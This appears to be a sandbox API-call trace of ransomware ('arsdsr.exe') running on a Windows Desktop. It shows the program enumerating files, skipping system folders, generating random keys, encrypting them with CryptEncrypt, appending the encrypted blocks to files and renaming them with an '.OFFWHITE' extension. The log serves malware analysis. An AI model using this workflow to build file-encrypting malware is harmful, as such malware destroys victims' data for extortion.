[0132.417] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.417] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x6a18, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x6a18, lpOverlapped=0x0) returned 1 [0132.417] GetProcessHeap () returned 0x500000 [0132.417] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.417] CloseHandle (hObject=0xb0) returned 1 [0132.428] GetProcessHeap () returned 0x500000 [0132.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.428] GetProcessHeap () returned 0x500000 [0132.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.428] GetProcessHeap () returned 0x500000 [0132.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.428] GetProcessHeap () returned 0x500000 [0132.428] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.428] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx" [0132.428] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx.OFFWHITE" [0132.429] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qk5utmohxrbukoh9dh.docx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qk5UTmohXRBUkoH9DH.docx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qk5utmohxrbukoh9dh.docx.offwhite")) returned 1 [0132.430] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb9be30, ftCreationTime.dwHighDateTime=0x1d5e38e, ftLastAccessTime.dwLowDateTime=0x95d5bd20, ftLastAccessTime.dwHighDateTime=0x1d5e6cb, ftLastWriteTime.dwLowDateTime=0x95d5bd20, ftLastWriteTime.dwHighDateTime=0x1d5e6cb, nFileSizeHigh=0x0, nFileSizeLow=0xef16, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="r3SqpP8u9J82LB.mp4", cAlternateFileName="R3SQPP~1.MP4")) returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2=".") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="..") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="...") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="windows") returned -1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="$recycle.bin") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="rsa") returned -1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="ntuser.dat") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="programdata") returned 1 [0132.430] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="appdata") returned 1 [0132.431] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="program files") returned 1 [0132.431] lstrcmpiW (lpString1="r3SqpP8u9J82LB.mp4", lpString2="program files (x86)") returned 1 [0132.431] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.431] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="r3SqpP8u9J82LB.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3SqpP8u9J82LB.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\r3SqpP8u9J82LB.mp4" [0132.431] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.431] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.431] PathFindExtensionW (pszPath="r3SqpP8u9J82LB.mp4") returned=".mp4" [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0132.431] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0132.431] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3838b2d0, ftCreationTime.dwHighDateTime=0x1d5d93d, ftLastAccessTime.dwLowDateTime=0x83372540, ftLastAccessTime.dwHighDateTime=0x1d5e627, ftLastWriteTime.dwLowDateTime=0x83372540, ftLastWriteTime.dwHighDateTime=0x1d5e627, nFileSizeHigh=0x0, nFileSizeLow=0xddd5, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="s-4DKj7Rf7zaEG5y9eG.mp4", cAlternateFileName="S-4DKJ~1.MP4")) returned 1 [0132.431] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2=".") returned 1 [0132.431] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="..") returned 1 [0132.431] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="...") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="windows") returned -1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="$recycle.bin") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="rsa") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="ntuser.dat") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="programdata") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="appdata") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="program files") returned 1 [0132.432] lstrcmpiW (lpString1="s-4DKj7Rf7zaEG5y9eG.mp4", lpString2="program files (x86)") returned 1 [0132.432] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.432] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="s-4DKj7Rf7zaEG5y9eG.mp4" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s-4DKj7Rf7zaEG5y9eG.mp4") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\s-4DKj7Rf7zaEG5y9eG.mp4" [0132.432] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.432] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.432] PathFindExtensionW (pszPath="s-4DKj7Rf7zaEG5y9eG.mp4") returned=".mp4" [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".log") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".cab") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".cmd") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".com") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".cpl") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".url") returned -1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".mp3") returned 1 [0132.432] lstrcmpiW (lpString1=".mp4", lpString2=".pif") returned -1 [0132.433] lstrcmpiW (lpString1=".mp4", lpString2=".mp4") returned 0 [0132.433] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc32eda0, ftCreationTime.dwHighDateTime=0x1d5d8d0, ftLastAccessTime.dwLowDateTime=0xd9e79670, ftLastAccessTime.dwHighDateTime=0x1d5d972, ftLastWriteTime.dwLowDateTime=0xd9e79670, ftLastWriteTime.dwHighDateTime=0x1d5d972, nFileSizeHigh=0x0, nFileSizeLow=0x41b9, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="sdmxOVb VExjpA-U59hO.swf", cAlternateFileName="SDMXOV~1.SWF")) returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2=".") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="..") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="...") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="windows") returned -1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="$recycle.bin") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="rsa") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="ntuser.dat") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="programdata") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="appdata") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="program files") returned 1 [0132.433] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="program files (x86)") returned 1 [0132.433] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.433] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="sdmxOVb VExjpA-U59hO.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf" [0132.433] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.433] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.433] PathFindExtensionW (pszPath="sdmxOVb VExjpA-U59hO.swf") returned=".swf" [0132.433] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0132.433] lstrcmpiW (lpString1=".swf", lpString2=".log") returned 1 [0132.433] lstrcmpiW (lpString1=".swf", lpString2=".cab") returned 1 [0132.433] lstrcmpiW (lpString1=".swf", lpString2=".cmd") returned 1 [0132.433] lstrcmpiW (lpString1=".swf", lpString2=".com") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".cpl") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".ini") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".url") returned -1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".ttf") returned -1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".mp3") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".pif") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".mp4") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".OFFWHITE") returned 1 [0132.434] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0132.434] lstrcmpiW (lpString1="sdmxOVb VExjpA-U59hO.swf", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.434] GetProcessHeap () returned 0x500000 [0132.434] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4e8 [0132.434] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sdmxovb vexjpa-u59ho.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.435] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=16825) returned 1 [0132.435] GetProcessHeap () returned 0x500000 [0132.435] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.435] GetProcessHeap () returned 0x500000 [0132.435] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.435] GetProcessHeap () returned 0x500000 [0132.435] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.435] GetProcessHeap () returned 0x500000 [0132.435] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.435] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.435] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.435] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.435] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.435] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.435] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.435] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.435] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.435] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.436] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.436] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.436] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.436] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x41b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.436] SetLastError (dwErrCode=0x0) [0132.436] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.439] GetLastError () returned 0x0 [0132.439] GetLastError () returned 0x0 [0132.440] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x42b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.440] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.440] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x43b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.440] WriteFile (in: hFile=0xb0, lpBuffer=0x53f4e8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f4e8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.440] GetProcessHeap () returned 0x500000 [0132.440] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x41b9) returned 0x5577b0 [0132.440] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.441] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x41b9, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x41b9, lpOverlapped=0x0) returned 1 [0132.442] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.442] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x41b9, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x41b9, lpOverlapped=0x0) returned 1 [0132.443] GetProcessHeap () returned 0x500000 [0132.443] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.443] CloseHandle (hObject=0xb0) returned 1 [0132.447] GetProcessHeap () returned 0x500000 [0132.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.447] GetProcessHeap () returned 0x500000 [0132.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.447] GetProcessHeap () returned 0x500000 [0132.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.447] GetProcessHeap () returned 0x500000 [0132.447] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.447] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf" [0132.447] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf.OFFWHITE" [0132.447] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sdmxovb vexjpa-u59ho.swf"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sdmxOVb VExjpA-U59hO.swf.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\sdmxovb vexjpa-u59ho.swf.offwhite")) returned 1 [0132.450] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0c6e6b0, ftCreationTime.dwHighDateTime=0x1d5e0bd, ftLastAccessTime.dwLowDateTime=0xca24f970, ftLastAccessTime.dwHighDateTime=0x1d5df31, ftLastWriteTime.dwLowDateTime=0xca24f970, ftLastWriteTime.dwHighDateTime=0x1d5df31, nFileSizeHigh=0x0, nFileSizeLow=0x16472, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="v1c0.avi", cAlternateFileName="")) returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2=".") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="..") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="...") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="windows") returned -1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="$recycle.bin") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="rsa") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="ntuser.dat") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="programdata") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="appdata") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="program files") returned 1 [0132.450] lstrcmpiW (lpString1="v1c0.avi", lpString2="program files (x86)") returned 1 [0132.450] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.450] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="v1c0.avi" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi" [0132.450] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.450] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.450] PathFindExtensionW (pszPath="v1c0.avi") returned=".avi" [0132.450] lstrcmpiW (lpString1=".avi", lpString2=".exe") returned -1 [0132.450] lstrcmpiW (lpString1=".avi", lpString2=".log") returned -1 [0132.450] lstrcmpiW (lpString1=".avi", lpString2=".cab") returned -1 [0132.450] lstrcmpiW (lpString1=".avi", lpString2=".cmd") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".com") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".cpl") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".url") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".ttf") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".mp3") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".pif") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".mp4") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".OFFWHITE") returned -1 [0132.451] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0132.451] lstrcmpiW (lpString1="v1c0.avi", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.451] GetProcessHeap () returned 0x500000 [0132.451] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f4f8 [0132.451] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\v1c0.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\v1c0.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.452] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=91250) returned 1 [0132.452] GetProcessHeap () returned 0x500000 [0132.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.452] GetProcessHeap () returned 0x500000 [0132.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.452] GetProcessHeap () returned 0x500000 [0132.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.452] GetProcessHeap () returned 0x500000 [0132.452] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.452] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.452] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.452] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.452] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.452] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.453] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.453] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.453] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.454] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x16472, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.454] SetLastError (dwErrCode=0x0) [0132.454] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.456] GetLastError () returned 0x0 [0132.456] GetLastError () returned 0x0 [0132.456] 